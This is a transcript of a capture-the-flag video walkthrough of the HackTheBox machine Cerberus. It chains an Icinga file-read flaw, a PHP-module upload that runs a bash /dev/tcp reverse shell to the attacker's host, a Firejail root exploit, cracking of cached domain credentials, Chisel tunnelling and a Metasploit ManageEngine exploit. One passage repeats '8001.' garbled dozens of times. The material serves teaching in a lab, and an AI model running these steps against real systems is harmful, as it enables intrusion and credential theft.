What's going on YouTube? This is Ipsec. I'm doing Cerberus from HackTheBox, which has a lot going on. It's both a Windows and Linux machine. And during the recon phase, we can do a lot of interesting enumeration via the TTLs. You may think it's just with pings, but TTL is part of the IP packet. So it also works with TCP and UDP, and that all comes in handy when it comes to recon. But once you get past the recon, the first step is hacking Linux. It's got an Icinga instance. There's two public exploits that you have to use in order to get shell on the box. Discovering the Icinga version is a bit difficult. You can probably just get lucky in Google, but if you look at JavaScript files in GitHub, you can piece together around the time the instance was built. But once you get a shell on the box, you have to privesc to root. You do some investigation around how Linux talks to Active Directory, get a cache credential, crack it, and they have a foothold on Windows that the exploit is just a ManageEngine CVE, and that gets you to administrators. So let's jump in. As always, we start with an nmap, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the nmap directory and call it Cerberus, and then the IP address of 10.10.11.205. This can take some time to run, so I've already ran it. Looking at the results, we have just one port open, and it is HTTP on port 8080, and its banner tells us it's Apache running on Ubuntu, and also redirecting us to this domain, which we'll add in a host file. But the really interesting thing is HackTheBox has this labeled as a Windows box, and it's saying it's a Linux box. So let me add this real quick, 10.10.11.205. So I'm guessing there's something funky with like virtualization going on, or this box is a router, and we can kind of confirm if this is the same OS because of the TTLs. Windows default TTL is 128. So if I ping 10.10.11.205, we see 127 come back. There's one router between HackTheBox and me. That's the VPN. So it decremented by one. That's why it's 127. Now I want to go and open up Wireshark. So I'm going to do sudo Wireshark. And we're going to make a request, or HTTP request, to port 8080 and see what that TTL is set at. So if I do a curl on 10.10.11.205 port 8080, and let's go to any packet, and the TTL is part of IP, so it's in both TCP and UDP, and we see the TTL is 62. And it's 62 because Linux's default is 64. It decrements by 2. And that's because it hits the host operating system, which is going to be Windows, decrements by 1, hits the VPN router, decrements by 1, and we get to 62. So we have confirmed there is a VM running on this machine. And this is a technique that I've used plenty of times whenever dealing with like NATed services to identify if it's the same machine or not, just because the TTL could be different based upon where it is in the network. And we could also do like a UDP scan. So I'll do nmap-su on 10.10.11.205. We'll do a sudo as well, and then do a -v and see if it finds any UDP ports to see if anything is listening. I did a -p- and didn't get any other TCP ports back, but I know for a fact that DNS is listening on UDP here. I think LDAP is as well. I'm not sure how long that nmap's going to take, so let's just do a dig at 10.10.11.205, and we can do localhost and see the server does respond back to us. I bet we could do, since we know Cerberos.local, we can see the internal IP is 172.16.22.1, and we have 10.10.11.205 as that. So we know there's two IPs. This is going to be on the virtualization network. Again, if we go to Wireshark, and my nmap is flooding it, so let's cancel that. We do see it did come back as 53 open, but I'm going to stop, restart this just to clear the screen, and I can show you when we do this UDP thing and look at the IP layer, we can see time to live is 127. So again, when you look at TTLs, it's not just about paying. Any packet will have them, and it does give some type of information. Now, a lot of that isn't really important for solving the machine, but we can get a lot of information up front So once we know we get a shell, we know we're probably going to be in a virtualized environment from this Linux machine. So let's take a look at the Icinga. So I'm just going to go and cat my host file. Then we can copy this, go to a browser, put it in, and it was what, port 8080. And we get to Icinga web login. Now, the first thing I do is Google for like default port. So we'll do Icinga, or default credentials, not port. So default login. I want to say it's like Icinga. So default password.info. Let's see what this says. Password, Icinga admin Icinga. So we always try defaults first. They almost never work, but when they do, it's just absolutely golden. Log in, and we get incorrect username or password. And I did a lot of research when doing this box, trying to find a way to get like the version. Sometimes you can do like changelog.md and get it. Let's see if we do Icinga web 2, changelog.md. We don't have it. If I go and search this with GitHub, see if there's any files here I'd look at. Maybe it's PHP or something like that. I'm sure maybe I could look at like JavaScript it's loading and paste together like what version of Icinga used that JavaScript library, but that is a lot more work than I really want to do. Where would JavaScript even be here? Can I do like search star.js? Let's see. Does this have like file names? I probably have to pull it down and search it. Maybe public. There we go. Public JavaScript. We can see helper.js was last year. There's something last week here. And I said I wasn't going to do this, and now I just like decided to go down this rabbit hole. So if we look at UI.js, look at the history of it. How often does this change? Somewhat frequently. So let us see if we can find this on the actual page. So if we went Icinga web 2, JS Icinga, so we have this. Now if I curl this UI.js, md5 sum UI.js, we have this as the hash. So now what we want to do is find when it matches this in the repository. Let's see, June 22nd, 2023. It is currently July 2023. So this probably came out after the box was released. We can easily grab the previous version. Let's see if we go to this commit. I don't want history.js. I want UI.js. View file. Do raw. Curl -o UI.js. md5 sum UI.js. And it is different. So we know for a fact, well, I can't say for a fact, but this is probably going to be older than whenever this commit was. If we go back twice, it'll probably tell us. I want to say it was sometime in 2022. Let's see. History.js. June 14th, 2022. So I'm going to go ahead and clone this repo. And it's been a while since I've done this. But now with it cloned, we can go into the repo. So public JS Icinga and pull every single version of this UI.js. And I'm sure there's going to be a better way to do this, but the way I always do it is just to git log, and we can see there's the commits. So I'm going to grep for commit, and then probably want every line that begins with commit. Then we can awk to get the second field. And then we put this in a for loop. So for I in this command, do a git checkout on this version. And we specify UI.js. And then after we check it out, we want to do an echo -n. And then we can do the git commit. and an MD5 sum on UI.js, and then done. And now we have a list of every MD5 sum for this UI.js and the git commit that it went to. So if we now do an MD5 sum on HTB Cerberus, I'll never pronounce that name correctly, UI, we can see it's 1F7. I'm going to search my history for that, and we can see it is this version. So 9640. Let's just do a git log. And I don't think it's that one. I thought we looked at that previously. Is that this one? 964. Yeah. Oh, shoot. Let's do a cd htb this. So when I curled the raw thing, I accidentally overwrote my previous file. So let's go back and grab this again. So curl -o UI.js MD5 sum this UI.js, and that's a different hash, 406BB. Let's search our history for this. And we can see it correlates to this one, 54ACF. If I do a git log, oh, I'm no longer in the git. We can see this is Friday, July 2nd, 2021. So now we know that this Icinga version is out of date, or we have a good idea it's out of date by like 2 years. So when we look for Icinga vulnerabilities, we know when to do the filter, right? So if we just Google Icinga vulnerability, what happens if I do this? We have a path traversal, and that is May 9th, 2022. So our version is in 2021, or that's what we think. So it makes sense that we could go to this one and it may be vulnerable. And what they're doing is a curl on, let's see, icinga.com demo lib PHP. So we have to find where third party is. So I'm guessing if we look at us, we're in Icinga Web 2, right? So what if we just do Icinga PHP third party Etsy host? And I'm actually going to send this over into Burp Suite. So I'm going to copy this, go, proxy, intercept is on, refresh, go to repeater tab, and I'm going to specify this. We get a not found. So we just have to figure out exactly how to get to this third party thing. Maybe it's lib then Icinga. So I'm going to copy this, lib Icinga, and we got the host file. And we can see dc.cerberus or cerberus.local. We could get like Etsy host name would be another thing. We can get the host name of Icinga. So now we have a file read vulnerability. I'm guessing this is like anything after this argument. It's loading some file and it's just doing essentially an fopen command. I'm sure if you read this whole post, we can see file get open, or file get contents on file path. So maybe the vulnerability make more sense if you read the full blog post, but I'm not going to go over it. It looks like it does a file open on everything after Icinga PHP third party, which leads to this. We can try a PHP filter, which would be crazy if it works. Convert dot base64-encode /resource equals 404 not found. So we can also try URL encoding this just to be safe, but it doesn't look like we can do a PHP filter. So let's see. The next step would be trying to find configuration files. So I'm going to Google. Let's turn Burp Suite off. And let's say Icinga web configuration files. We have this configuration. Let's see. I wonder if I can specify database. So if Icinga web, I'm going to do change database password. This goes in authentication. So if we look through all of these, we see config.ini and config.ini and resources.ini, and it's in etc Icinga web 2 by default. So I'm going to try this real quick. So etc Icinga web. Did I copy the whole thing? etc Icinga web 2, and we wanted config.ini, and we do have it. So this doesn't look like anything that interesting to us. Let's try resources.ini, then roles, then authentication. So let's go to resources, and we can see Icinga web 2, username Matthew, and the password of Icinga web password 2023. So I'm going to go back and let's try logging in. So Matthew, put in this password, and we get logged into Icinga. And if we had kept reading this blog post, the one where it talked about the LFI, it also has a remote code execution for authenticated users that can edit resources on it. And what they're doing is editing a resource. It has to be the SSH resource. And they drop a PHP file. And the reason they can do that is because of a null byte. So the other thing is we have to have a valid certificate. So instead of going through and reading this verbatim, let's just do a demo and hope the demo gods don't get to us. So I'm going to go to configuration. Let's see, where is resources? Is it application, resources, create a new, and we need the SSH identity. The name doesn't matter. And then for the user, this is where the LFI comes in. So we're going to put a bunch of slashes. I'm going to go to dev shm, and we'll do ipsec.text. And if I put just a string here, if we do test, we get say SSH key is invalid. We may be able to actually drop an SSH key, but keep in mind, port 22 isn't open to us. So that's why we want to drop a PHP file. So the next thing to do would be generate a SSL key or RSA key. So open SSL, gen RSA -out key.pem. I want to do 1024 bits. Just cat this. We can grab it. And as long as we have the key here, it works. So now we have a resource. It's in dev shm ipsec.text. So let's go back to Burp Suite, and we will read ipsec.text, and we can see the file here. Now, this was a file get contents, so it's not a include, so we can't just execute files. Additionally, if we tried doing, let's see, like var dub, if we do var dub html index.php, we see a file here. So if we wanted to try to write a file to, let's say, test.php, I don't think we have permission. We can validate that real quick. So let's create a new resource, SSH, create another one. Instead of that, we'll do var dub html. What did I call it? Test.php. And we just need a key. I'm not going to bother putting a file here. Or a good thing. Let's see, we error out on create. I'm guessing this is because we don't have permission to the file. It's probably only writable by root. So what they do is create a module. So by default, Icinga loads modules out of user share Icinga web 2 /modules, which is also only writable by root. But we can change the module path to be dev shm and then create a Icinga module in this directory. The other trick where they had the null byte, let's just go over that really quick. Null byte is the terminator for a string. So if we can sneak the null byte in, we can get it to just read the PHP file and not the SSL certificate or the RSA certificate, which will let a module work. If the RSA certificate's in the module, then I think it actually fails. So that's why we need this. So I'm going to go back to dev.shm, and we also need to test if it will create a directory. So we're going to put it in please subscribe /ipsec.txt. We'll do ipsec. Yeah, we'll do ipsec.txt. That's fine. And we're going to do ipsec was here, put in the key, and now I'm going to intercept this request. So we're going to go to burp suite, turn proxy on, save changes, and we have the key here. 0D 0A is a new line. So I'm going to put %00. So we have a null byte here. So on a file, like if it's just reading it, chances are it's going to terminate here, and everything afterwards will get dropped. It's critical that the null byte is ignored, though, when it's checking to make sure the RSA key actually exists, right? So I'm going to forward this, and we see no error message. That's actually weird. I didn't think it would go back to this page. But let's go to repeater and see what happens. So if we do dev shm, please subscribe, ipsec.txt, we see ipsec was here. And if I highlight this, we can see a null byte is actually in it. I guess we can look at hex as well. So let's see. Whereas ipsec was here, we see the 0D0A and the null byte is here. So now the final step is just to look at how Icinga modules work. So if we do Icinga web modules, let me make sure burp suite is off. And let's see, 08 modules. Let's see. I'm going to add GitHub to this. See if we can find an example module. Okay, if we look at configuration.php, I think we can just put PHP code in a folder and call it configuration.php. I don't think we need all this metadata. Maybe run.php works as well, but let's try this real quick. So I'm going to go back to my proxy tab. Let's go resources, create a new. I'm going to do file, resource name. We'll go and say does not matter. I was going to say it's something with the module, but you don't actually need that. It's actually SSH identity. And I'm going to call this module malicious, and we'll do configuration.php. So now we can just write a PHP shell. So I'm going to do system, and then let's get a base64 payload. We could probably just grab the PHP module, but that's going to be really big, and I want to be effort on size. If you're curious about the PHP module I'm talking about, it's like PHP reverse shell. It's like 100 some lines, but I'm just going to do echo-n. Then we'll do bin bash. Is it -i? Dev TCP 10.10.14.8 9001 0 and 1 base64-w0, and we don't have any special characters. That is good. So we'll do echo-n base64-d, pipe it over to bash, and then we want to put the certificate. So we'll do key, or not certificate, the key, I guess. Copy, paste. So I think this is good. I'm going to close out the PHP. Leaving open tags just upsets me. So we're going to turn intercept on. We're going to save changes. Going to intercept this, 0D0A. We're going to put the null byte there. We're going to forward the request. And then if we go to the modules, we don't see a module here, but if we change the module to dev shm, save changes, go to modules. We have please subscribe and malicious. So I'm going to do NC-LVNP 9001. I'm going to click on malicious, and we got a shell. So it executed our module right there. So let's do a Python 3-c import pty.spawn bin bash, then stty raw minus echo fg, and then export term is equal to xterm. Before I begin trying to do any type of privesc, I'm mainly curious what type of virtualization environment I'm in, if I'm even in one. My first step is to look at the root directory to see if I see like .docker environment, and I don't. I think it's just .docker env. I can also check like, let's see, dev, is it proxy pu info to get like the CPU. That's like my next step. And this looks like non-VM type of thing. Like I just see the AMD processor. The other place I look at is DMI. So this is going to be sys class DMI ID. If we look at product name, we can see virtual machine. So we definitely know we're in some type of virtual machine. And let me fix my TTY. Let's do stty-a, rows 121, columns 31. So stty, rows 31, columns 121. Okay. So if I do an ls on this, we have a few things. We could do like buyer's vendor. It's probably going to be Microsoft. I did ls. American Megatrends. That's not what I thought. Let's see, what else was there? There's chassis. So if we do chassis vendor, we get Microsoft Corporation. If we do sys vendor, it's probably gonna be Microsoft as well. So I'm guessing we're in Hyper-V or like just the default like Linux on Windows. If I open a new tab and do cat sys class DMI ID product name, we can see VMware. What was the other one we did? Chassis vendor, no enclosure. Let's do sys VMware, right? So that would be how you could identify what type of environment you're in. So that's not really important. I think Limpy's actually says it's not in a virtual environment, but I digress. We could run Limpy's, and that would tell us everything we need. But the two things I generally run when I'm dub data, I normally don't bother with sudo because we don't really know the password. I guess we could cd etc, was it Icinga web 2, and then cat resources. We could try the Icinga web password 2023, but really dub data should not have a password really set to it. If we cat etc passwd for everything that ends in sh, $sh. There we go. There's only, there is a Matthew. If we su Matthew, put in that password, authentication failure, and that is the correct password. So we're kind of at a dead end right now. Can we go in Matthew's directory? We can't. So the first thing I generally look at is a PS output. So if we do ps-ef-forest, less is not found. Weird. Let's just go to the top. And we go down. And this is where we start having processes. The first thing we see is SSSD. And this is going to be some way for Linux to be able to authenticate against Windows. So we see the domain, Cerberos.local. We have UID 0, GID 0, so that's going to be root. So we can't really get into this configuration. If we get in this configuration, we may find like domain credentials or something, but that's going to be owned by root. So keep that in the back of your mind. And we can look for anything else. There's a lot of dub processes. There's a reverse shell. Redis. We can go in like MySQL and dump credentials. We could also look at SetUID files. So we'll do find-perm-4000, pipe errors to dev null. And we have a couple things. I don't recognize cc creds check pwd. If we execute it, and it says this binary is not designed to be running this way, the admin has been notified. I did Control Z to background it. We also have FireJail, which is not default. So these are the two binaries that stick out. I'm going to execute FireJail. And let's see, PID, it looks like we just put ourselves in a jail. So we'll exit to get out. We can do FireJail -- version. And we see FireJail version 0968 release candidate 1. So I'm going to Google this with FireJail, and I'll add exploit to it. And we see a posting that says on seclist, local root reachable via -- join logic, and unprivileged user can fake the system and have FireJail essentially attach to an environment you create, which allows you to get root. So I'm looking for a POC. Do we have one? Let's see. Go here. GitHub, FireJail. These are commits. So let's go grab this CVE. GitHub. Let's see. Local root. Let's do POC. FireJail advisory. Python FireJail join. Seclist. I don't think it's in advisories. So I think on the very first Google search result, this is someone's OSCP guide. And this, does this one have it? NVD, release notes. I don't see a POC. I could also be blind. An OSCP cheat sheet, FireJail. This looks like it. And it's a Python script. So FireJail LPE. So let's copy this. Does this have instructions? So we execute it. It says you can now run FireJail join. So we need two terminals to do this. So the first one, we run this Python script. And I'm guessing it holds this terminal open. And then we run the second one. So I'm going to copy. Let's just go dev shm v firejail.py. Oh God, is it going to make me? Oh man. It's been so long since I used Nano. Hopefully I can exit it. Control X, save. Right. Did it have Vim? It did not have Vim. Okay. I would have been really upset. So now we have firejail.php, .py. Do we have tmux in this? Do we have screen? We don't have either. So we need to get another shell. So let's do nc lvnp 9001. I could probably run it with like an ampersand, but I'd rather just do a full new terminal. Let's go back to modules, click malicious, no such module installed. Let's add dev shm back here, save changes, modules, malicious, got a shell. Import pty, pty spawn, bin bash. Oh shoot. Python 3-c import pty, pty.spawn, bin bash. stty raw minus echo fg. Okay, so let's do Python 3 firejail.py. I think that's what it said to do. They called it bin, but that's fine. Firejail.py needs to have the execute bit. chmod plus x. Okay, So I can now run FireJail -- join equals 2046. And we do ID. We are not root. Oh, sudo su dash. Let's just do su. There we go. So I guess it just gave us the su token. So let us now export term is equal to xterm, then stty rows 31 cols 121. I think that's what the variables were from earlier. Anyways, now that we're root, we can go into the Active Directory files on this box, right? If we do ps-ef forest and then look at SSSD, we saw this earlier, but we couldn't access any of the files because we weren't root. We can also probably go into Matthew's directory to see if there's anything there. Sometimes when you get like root privileges, it's not always about going higher in privileges, but you use those privileges to go lower and pillage information. But that's not the case here. We want to go into the Active Directory Linux stuff. And there is a Hacktricks page. So if you do Hacktricks Active Directory Linux, let's see. We have a whole page of things we could be doing here. And it talks, let's see, if we go down, Cerberos tickets and temp. My browser was like freezing a little bit. So if I do ls/temp, I don't see any Caribbean files. Where was it talking about them? It's talking about them here. So we don't have any active. I don't want to put any tools on the machine yet. And it's looking at, let's see, klist. Man, I don't know what just happened to my browser, but it seems to be behaving now. I could swear there's SSD here. Talking about, oh, there we go. So we got secrets.ldb and secrets.mkey. So I'm going to try this mkey first. So if we do strings on this file, it doesn't exist. We can try a strings on this file and then grep for everything that contains a $, because that's going to be how the hash is stored. We don't have anything here. So let's go etc SSSD. Is that where it is? Conft, nothing there. If we cat this config, we see cache credentials is true. So we want to figure out where these cache credentials are. So I'm just going to go Google SSSD cache credentials and domain option enabling offline authentication. And let's see, does this say where they're stored? I don't think this page does. Let's see. I don't think I can find the page that I was looking for, but I did a lot of research when solving this box around the cache credentials to see how it works. And I think it's in varlib SSSD. Where were the other files at that we looked at? Were like mkey. cd varlib SSS, then db. And we have this cache credential or cache Cerberus local LDB. So if I do a strings against this file, so let's just do a strings. We have this hash. I wonder if I do like a -b1, or we need to do grep -b1. My bad. We'll do b5 a5 to go 4 lines before and 4 lines after. See, we can see information about the account. Maybe we should do 15. Groups Cerberus. It's probably going to be Matthew's password, because we can see Matthew at Cerberus.local. So let's grab this. And then I'm going to go over to the Kraken, which is just a machine on my network. You can crack just on your host machine. If you crack in a VM, it's probably going to go slower than you want it to. So I'm going to do v, call this Cerberus, And then hashcat hashes this. And we'll do opt word list rocku.text and see if this cracks. And I don't have to specify the hash mode because hashcat is in auto detect mode, and it looks like it has cracked it. So if we go up, we can see the password is 1472583. Just a string of numbers. Definitely doesn't meet password complexity. Let's see. Is that the same password here for Matthew? I wonder. I never thought about that when I was solving this box. I went to the SSSD because I noticed that was running. It went straight there. I wonder if it's the same password. I doubt it is. V. Put this in. There's probably an open SSL command we can run to verify it. But if it doesn't crack instantly, I'm going to assume it's not the same password. So give it probably another 5 seconds. And at this point, it had cracked the first time. So not the same password and the shadow file. I'll just leave that running for good measure. But we have Matthew's password, and we don't know exactly what it goes to. But remember, we're in a virtual environment. If we catted Etsy host or we did the dig, so dig at 10.10.11.205, what was it? Cerberus.local is what we did at the beginning. We can see the DC is 172.16.22.1, which does match. So what I want to do is forward my connection here. So let's see. I'm going to see, there's no SSH exposed here. I could either use Chisel to forward SSH and do an SSH tunnel, or I can just upload Chisel here and tunnel to the domain. I think that's what I'm going to do because I highly doubt like Evil-WINRM or let's see. Is there nmap? There is not. Let's see. Echo, is this last exit code? Echo 1. That's last exit code. So let's do echo 1 to dev TCP 172.16.22.1.445. And then echo like this. I'm guessing that's a timeout. Let's try, was it 5985 is WinRM? So that port is open, 5986 is not, but it looks like WinRM is open at 5985. So we want to tunnel to this port. And if you don't know what I'm doing here, I can probably do a timeout one. Will that work? God. Timeout 1, echo 1 Mississippi. It should be done. I guess the timeout doesn't work with redirection. That's annoying. But this is just testing if a port is open through bash. And we can see, since I can write 1 to this WebSocket, or I shouldn't say WebSocket, this TCP socket, and its exit code is 0, which means success, we know that port is open. But I spent too long talking about that when we just want to get Chisel in this box. So do I have Chisel? I do. Let's do Python 3-m HTTP server. Let's go in root, wget 10.10.14.8, 8000, Chisel. And we are downloading Chisel now. Okay. So over here, I want to run Chisel in server mode. So chmod plus x Chisel. Sudo. There we go. And now we can do Chisel server reverse SOCKS 5. We need to specify the port. We'll use 8001 since Burp Suite is using port 8080. And let's go over to our Icinga box. We can do chmod plus x on Chisel. Go in client mode. And then we want to specify 10.10.14.8, 8001 r:/SOCKS to tell it we want a SOCKS proxy. And we should see a ton address open up. So we have a SOCKS listening on 1080. So now if I do a proxy chains, and we can say NC 172.16.22.1, I think is the port, 5985, and we'll add a -ZV. We can see the port is open. So let's do Evil-WINRM -I 172.16.22.1. Don't forget to proxy chains it. -U, the user of Matthew -P. We want to get the password, and we see Hashcat did not actually crack it when we had the shadow file in. We'll do --show so we get the password and see if this works. Evil-WINRM not found. I could have swore I installed Evil-WINRM. Gem install Evil-WINRM. Let's do sudo. I have to figure out exactly why that's not installed. Let's see. I'm going to fix these issues. If you're curious what I'm doing, if you go github.com/ipsec parrot build, there is a Ansible script in here that I used to install WinRM that I guess I just had commented out. It's probably under install tools, tasks. Let's see. Gem tools. This is it. So I install all these gems packages. So I'm going to do that just offline so I don't waste 5 minutes of your time. Okay, I have ran a gem install against every one of those packages. So now when I do a proxy chain, the command actually works and we get a shell as Matthew on the domain. And following the logic of the last one, we could run WinPs, but first, why don't we just try like running git process and see what sticks out to us. So I'm going to run it. And then let's just go down the list. We have certserv, so maybe we could do some type of certificate attack. This is a domain control, I believe, because we did see DNS running. We have a Postgres server, so we could potentially go and exploit this. SQL server as well. It's weird that we have two databases. I wonder if SQL server, I think that's Microsoft SQL. We also have Java. So there's a lot of applications that are installed here. SQL Server could also be a binary in the Postgres thing. It doesn't have to be MS SQL, but for some reason, I think it is. Let's go to CD program files. Let's put that in quotes. Do a dir and see if there's anything non-standard. So we got common, Google. What is Google? Is this just Chrome? We have Chrome, Internet Explorer, VMware, WinRAR. So nothing really there. Let's do CD program files x86 dir. Nothing too interesting here. Oh, wait. We have ManageEngine. So let's go in ManageEngine. We got ADSelfService Plus. Is there anything interesting here? I was hoping to get like a version out of this. There's probably a version maybe in conf. There is PGSQL, so that's definitely going to be Postgres. Let's see, type server.xml. We see files 10/21/2022, so that is relatively old. Verge, string version. I don't think this is it. Let's see. Let's do Cerberos ManageEngine. I don't have Cerberos installed. We can install it. I'm just going to go to exploit DB. I'll have to figure out what package that is and add it to my build. Let's see, ManageEngine. Let's see, SSSD Plus. Hash exposure. User enumeration. Self-service RCE, unauthenticated. What is this? CVE ID. Central file storage. And not much is sticking out at me. I really hate how many products ManageEngine has because I just want like the self-service ones. Let's see, does that do anything? We have NTLM hash exposure. That may be useful. I just tried adding a space to see if that changes anything. I don't see anything. I'm going to try msfdb run. See if Metasploit has anything. Occasionally you do find things in Metasploit that's not in Searchsploit. And I know ManageEngine stuff almost always ends up in Metasploit eventually. And wow, the UI changed since I've last used it. I've never noticed jobs and agents before. But let's search ManageEngine. And I always go to the top. 2023. And this is ADSelfService Plus. So I'm going to do a use 5. I'm just starting with the newest one. We can show options here. Let's see, what port does this talk to? 9251. So we have to get to 9251. We'll have to figure out the issuer URL and the SAML endpoint GUID. So the first step is getting to port 9251. Let's see, if we go here, actually, I'm just going to do a proxy chains real quick. So proxy chains, 172.16.22.1. We need to do netcat zv and 9251. And I'm just going to see if it's going to be that easy where we can just use our existing tunnel. Doesn't look like it though. Let's see. Where's Chisel running? Here. I don't think I have the web server open anymore. So let's do Python 3-m HTTP server. I meant to do ls first, so you can see there is a Chisel exe. So when we go back to our PowerShell, I'm going to go and program data. Oh, crap. I killed the tunnel, which killed my WinRM session. We don't want to do that. So let's run this again. Program data. Okay. Then let's see, op Chisel, Python 3-m HTTP server. And we can wget 10.10.14.8, port 8000, chisel.exe-o, chisel.exe. If this didn't work, if the wget for some reason doesn't download it, I can use like WinRM or Evil-WINRM's default upload function, but I have more success with wget than I do with the upload function because I want to say it works by like converting the binary into base64 and then using the standard in to pipe it into the application, which it is buggy. So let's just do Chisel exe, make sure we can run it. It looks like we can. So we can do client reverse. No, we want client 10.10.14.8, port 8001, our SOCKS. We'll stand up another Chisel tunnel. Let's see. Where is this one listening? We only have one so far. What port did I do? Did I do the wrong port? 8001. This is port 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. 8001. I don't know why it's not connecting to me. So Chisel exe, that works. Client 10.10.14.8, port 8001, doesn't want to be lowercase. That'd be bizarre. Let's see, not specified. Run this again. And I'm going to give it like 10 to 15 seconds. I don't know why it's not connecting to us. I'm kind of curious if it's because we already have an instant, like a ton adapter open. Let's see. We could always not do the reverse SOCKS and listen on a local host. So I'm going to Control C to close Chisel. And then we can do a reverse 9251, forward it to localhost on 9251. I think that's the port we use. Go back here. And we have this one open. So I think it's only one SOCKS at a time would be my guess. So hopefully this exploit only requires us using one port. Not allowed. Is it 9521? Let's see. Here's this. No, 9251. Oh, we're proxy chaining. There we go. So if I go to 127.0.0.1, 9251, bad request, it needs TLS. So let's do HTTPS. Accept the certificate. And it's transferring data. Show login. I'm going to look at the network tab. And it aborted. Why did it stop? Wait. We're getting more things. It's trying to show login. Calling authorization.do, and it tried to go to dc.cerberos.local. So let's do sudo v etc host and add this. And we want to add it to 127.0.0.1. Save it. I'm going to turn Burp Suite off. Did I typo it? I thought I copy and pasted it. Unable to connect. Wonder if it's cached. Curl. Let's see, 9251. Okay, so it redirected me to port 443. I just noticed the port is missing, ADFS LS. I think that was one of the options we need is the issuer URL, which I think is going to be this right here. Let's see, 9251. Advanced, we'll accept this and see if it actually loads. It needs 443 as well. So what I want to do now is I'm going to see if I can get WinRM working without the reverse SOCKS. And then we will use reverse SOCKS for the Windows tunnel. This is an odd issue. So let's close this. Where is this tunnel? So we'll do 127.0.0.1 here. We can load this up. And then we go to our SSH session here. And we can do reverse 5985, 127.0.0.1. Actually, we want 5985 redirected to 172.16.22.1. That's the DC's IP. Okay. Evil-WINRM, Matthew. See if we log in. We don't want proxy chains anymore. Okay, we have a shell. So let's go to program data. And then we can do /chisel.exe, client 10.10.14.8, port 8001, our SOCKS. And hopefully we can get a SOCKS reverse established. We have ton 0 listening, so that's looking better. So let's go into our host file, and we can get rid of DC Cerberos, and we can put it here. So let's do DC Cerberos local. Okay. And in here, we'll need to use another proxy. Let's see, where is add? We want to add SOCKS 5, 127.0.0.1, port 1080, proxy type, SOCKS 5. Save. Actually, I'm going to change. Let's not send DNS through the proxy. And we can do HTTPS DC dot this. And hopefully this one now works. Does not look like it is, though. Let's see. Sudo nc zv. Oh, we don't want to do sudo. We want to do proxy chains. And then DC Cerberus local 9251. Why is it going to 4222? Let's do 1010, 110. What's the other octet? Oh, not 110. It is 127.0.0.1. Okay, that works. So if this works, it's going through the proxy. So 127.0.0.1.9251. That's definitely not my box, right? 925. That could be my box. There's still a Chisel running, forwarding localhost. Oh, man. So we got 2 ways to get to this box. That is messy. Oh, I have Burp Suite. I didn't click SOCKS. So let's go advanced, accept the risk, authorization, this ADFS, we should now be able to hit it because we're going through SOCKS. There we go. The trick was making sure we selected SOCKS 5 after configuring the proxy. So now we want to log in as Matthew at Cerberos.local and his password that is on this tab. Paste it in. And then it tries to go to DC. So let's add another host, v etc host, DC, save, resend, accept this SSL cert. And it's hanging. And we just have this SAML login and then this hash. And I think this hash is what we need for the exploit. So let's go back here and we'll try this. So set GUID to this. Then we want to set issuer URL. Let's see, what was that other one we did? Let's see, ADFS issuer URL. This should always be the same. And I got to turn the proxy off to do that. ADFS issuer URL. So it's ADFS services trust, I think. Is that right? Let's try it. HTTPS, DC. We got to make sure we spell this correctly because that does matter. Paste that. Then ADFS services trust. Okay. Let's see, we have that. Our port, SSL, target URI, SAML login. We need to set our host. So set, that's going to be pretty much the same thing as issuer URL. Okay, so we set the GUID. We set issuer URL. We have our host, 9251. See, server host. We need to set server port. Let's do 8082. See, payload interpreter, that's fine. Set L host to be ton 0. Set serve host to also be ton 0. 10.10.14.8. And then I think we set reverse allow proxies to true. And then we set, is there a SOCKS 5? So proxies. Proxies. Let's see. Metasploit set proxies SOCKS. I don't know this syntax for this. Set proxies SOCKS 5 colon. So SOCKS 5 colon 127.0.0.1 port 1080. And then we run. And we may want to set auto check to false. So set auto check false. We run again. And we'll see if it actually exploits. If it doesn't exploit, I'm going to look at that SAML URL first. Because I want to say there was, when we were looking at before, it was /ls, not trust. Oh, it could also be HTTP, not HTTPS. Let's go back to where we allowed it or created it. That's our host. Let's try HTTP. Run. And there we go. We got sending stage, so that definitely looks promising. And we have Interpreter 1 open. And wow, this is different. Do I have just... Okay. I thought I was in like a CMD prompt already. But if we do get UID, we are anti-authority system, so we can do users, cd/. There we go. Users, administrator, then desktop, and root.txt. I'm guessing, where is users.txt? Did we ever get that? Is it just in Matthew? Desktop. Yeah, so user.txt is on the Windows host as well. So hope you guys enjoyed that video. Sorry for all like the screwing around with the tunnel stuff. That was different. I did not expect to run into all those issues. So the trick was we had to make sure we did a reverse port forward on Linux, because this only opens port 5985, right? That's the only port we required for Linux. And then when it came down to the Windows, we wanted to do a reverse SOCKS because we had to forward port like 92 or that weird ManageEngine port like 9251 or something. We needed port 80. Who knows what other ports we needed, but that's going to be the video. Take care, guys, and I will see you all next time.